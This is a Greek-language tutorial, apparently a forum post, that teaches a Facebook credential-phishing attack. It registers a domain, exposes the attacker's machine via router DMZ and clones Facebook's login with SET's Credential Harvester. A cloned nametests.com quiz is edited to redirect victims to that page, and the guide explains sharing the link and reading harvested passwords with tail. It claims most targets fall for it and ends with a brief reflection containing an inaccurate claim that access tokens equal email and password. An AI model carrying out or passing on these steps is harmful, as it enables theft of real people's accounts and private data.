Σε αυτο τον οδηγο θα μαθουμε την επιθεση Phising your Ego
Γιατι εδωσα αυτη την ονομασια θα καταλαβετε στο τελος του οδηγου
Τι θα χρειαστειτε;
1.Kali Linux
2.Domain name
Πηγαινουμε εδω κανουμε εγραφη και καταχωρουμε ενα domain name
οταν επιλεξετε checkout θα σας παει εδω
ανοιγουμε ενα τερματικο και γραφουμε
curl ipinfo.io
σημειωνουμε την εξωτερικη μας ip
τωρα πηγαινουμε πισω στο freenom και επιλεγουμε use dns και βαζουμε την εξωτερικη μας ip
επιλεγουμε continue αποδεχομαστε τους ορους και επιλεγουμε complete order
περιμενουμε περιπου 5-10 λεπτα ωστε να γινει η ανακατευθυνσει του domain name στην εξωτερικη μας ip
το δικο μου domain name ειναι find-out.ml
για να το επιβεβαιωσουμε γραφουμε ping find-out.ml εσεις κανετε ping το δικο σας
αν δειτε οτι εμφανιζετε η εξωτερικη σας ip τοτε εχει γινει η ανακατευθυνσει
πχ
τωρα πηγαινουμε στο router μας http://192.168.1.1 η http://192.168.2.1 η http://192.168.1.254 βαζουμε το ονομα χρηστη και κωδικο πηγαινουμε firewall και επιλεγουμε DMZ εκει θα επιλεξουμε enable και θα βαλουμε την εσωτερικη μας ip
για να δουμε την εσωτερικη μας ip απλα γραφουμε σε ενα τερματικο ifconfig
πχ η δικια μου ειναι 192.168.1.2
τωρα θα χρησιμοποιησουμε το SET(Social engineering Toolkit) για να κλωνοποιησουμε την σελιδα του facebook
οποτε γραφουμε σε ενα τερματικο setoolkit
επιλεγουμε 1 Social-Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method
2) Site Cloner
το SET θα μας ρωτισει την ip που θα μας στελνουν τα αποτελεσματα εμεις βαζουμε το domain name μας
και γραφουμε την σελιδα που θελουμε να κλωνοποιησουμε
πχ
παταμε enter και το SET θα αντιγραψει την σελιδα του facebook και θα ξεκινισει τον apache server μας
εμεις παταμε ctrl+c ωστε να βγουμε απο το SET
τωρα στην διαδρομη /var/www/html του apache θα δουμε 3 αρχεια το ενα index.html ,post.php και harvester-(με ημερομηνια/ωρα).txt
με την εντολη mv /var/www/html/index.html /var/www/html/login κανουμε μεταονομασια του αρχειου index.html σε login
πηγαινουμε στον φακελο
τωρα εφοσον ειμαστε στο browser μας (περιηγητη) παταμε ctrl+shift+P για να παμε σε μυστικη λειτουργεια (igognito mode)
γραφουμε πανω στην url http://el.nametests.com
διαλεγουμε ενα test που πιστευετε οτι θα τραβηξει τα θυματα σας πχ εγω διαλεξα μιας και ειναι και επικαιρο
παταμε shift + print screen θα μας εμφανισει εναν σταυρο και επιλεγουμε το πλαισιο της εικονας αυτο στην ουσια ειναι print screen με αποκοπη οποτε εμεις θελουμε να βγαλουμε μονο αυτο
η εικονα θα εχει αποθηκευτει στον φακελο pictures εμεις βρισκουμε την εικονα την μετα ονομαζουμε σε pic.jpg απο .png
και την μεταφερουμε στον φακελο /var/www/html/
τωρα πηγαινουμε στην σελιδα nametests και παταμε ctrl+u για να δουμε τον κωδικα της σελιδας
παταμε ctrl+a για να τον επιλεξουμε ολο και ctrl+c για αντιγραφη
γραφουμε σε ενα τερματικο leafpad /var/www/html/index.html και κανουμε επικολληση του κωδικα που αντιγραψαμε πριν
πχ
πριν αποθηκευσουμε κανουμε τις εξεις αλλαγες
διαγραφουμε αυτες τι γραμμες
<meta property="fb:admins" content="1************"/>
<meta property="fb:admins" content="1************"/>
<meta property="fb:app_id" content="1************"/>
αλλαζουμε τις γραμμες
<meta property="og:site_name" content="nametests.com"/>
σε
<meta property="og:site_name" content="domain name sas"/>
μετα
<meta name="author" content="nametests">
σε
<meta name="author" content="domain sas">
μετα
<meta property="og:url" content="http://el.nametests.com/test/ti-tha-pareis-apo-ton-agio-basile/14969/"/>
σε
<meta property="og:url" content="http://domain name sas/index.html"/>
μετα
<meta property="og:image" content="//image.nametests.com/promote_image/2016/11/30/67503e29aaa1afgdserfs9978a3d8a42d7.jpg"/>
σε
<meta property="og:image" content="http://domain name/pic.jpg"/>
μετα
loginURL_basicperms: '/accounts/facebook/login/?scope=email%2Cpublic_profile&next=/test/ti-tha-pareis-apo-ton-agio-basile/14969/%3Fstart%3D1',
loginURL_postperms: '/accounts/facebook/login/?auth_params=auth_type%3Drerequest&scope=PERMSLIST&next=/test/ti-tha-pareis-apo-ton-agio-basile/14969/%3Fstart%3D1'
πριν αλλαξετε το
loginURL_postperms: '/accounts/facebook/login/?auth_params=auth_type%3Drerequest&scope=PERMSLIST&next=/test/ti-tha-pareis-apo-ton-agio-basile/14969/%3Fstart%3D1'
καντε το αντιγραφει
ανοιγουμε το post.php και κανουμε αντικατασταση το http://www.facebook/
προσθετουμε στην αρχη http://nametests/ και κανουμε επικολληση
αποθηκευουμε το post.php
στον index.html αλλαζουμε σε
loginURL_basicperms: '/login',
loginURL_postperms: '/login'
απο
loginURL_basicperms: '/accounts/facebook/login/?scope=email%2Cpublic_profile&next=/test/ti-tha-pareis-apo-ton-agio-basile/14969/%3Fstart%3D1',
loginURL_postperms: '/accounts/facebook/login/?auth_params=auth_type%3Drerequest&scope=PERMSLIST&next=/test/ti-tha-pareis-apo-ton-agio-basile/14969/%3Fstart%3D1'
αποθηκευουμε και ειμαστε ετοιμοι
τωρα κανουμε εναν restart τον apache server μας με την εντολη
service apache2 reload
τωρα μας μενει να κοινοποιησουμε τον συνδεσμο δημοσια η σε μια ομαδα η στο προφιλ τους θυματος η στο δικο μας προφιλ
ο συνδεσμος θα ειναι http://domain name sas/
οταν καποιος πατησει στον συνδεσμο θα δει αυτο
οταν πατησει συνδεσου στο facebook
οταν βαλει τα κριτηρια συνδεσης του , εσεις θα τα εχετε παρει
με την εντολη tail -f /var/www/html/harvester*.txt θα βλεπετε τους κωδικους των θυματων
μετα στο θυμα θα του εμφανιστει αυτο
και μετα θα τον παει στην κανονικη σελιδα κτλ χωρις να καταλαβει τιποτα
Με την συγκεκριμενη μεθοδο 8/10 ατομα την πατανε.
Η επιθεση πηρε αυτο το ονομα γιατι οι ποιο πολλοι χρηστες του διαδικτυου παντα θελουν να εξωτερικευουν το εγω τους στα social media ,αυτο βεβαια εχει σαν αντικτυπο να βγαζουν στην φορα την προσωπικη τους ζωη και να βοηθανε κακοβουλους χρηστες να εφαρμοσουν την τεχνη της κοινωνικης μηχανικης εναντιον τους.
Η συγκεκριμενη σελιδα που κλωνοποιησα σου περνει το access token απο το facebook ....το access token ειναι στην ουσια το email και ο κωδικος σας ......οποτε ο ιδιοκτητης της εφαρμογης μπορει να λαμβανει διαφορες πληροφοριες απο το προφιλ σας οπως αναγνωση μηνυματων η ακομα να κοινοποιει διαφορα χωρις να το γνωριζετε.Οποτε σε κανει να αναρωτιεσε τι ειναι ποιο σωστο......να περνει τα στοιχεια σου ενας κακοβουλος χρηστης η ο προγραμματιστης της εφαρμογης?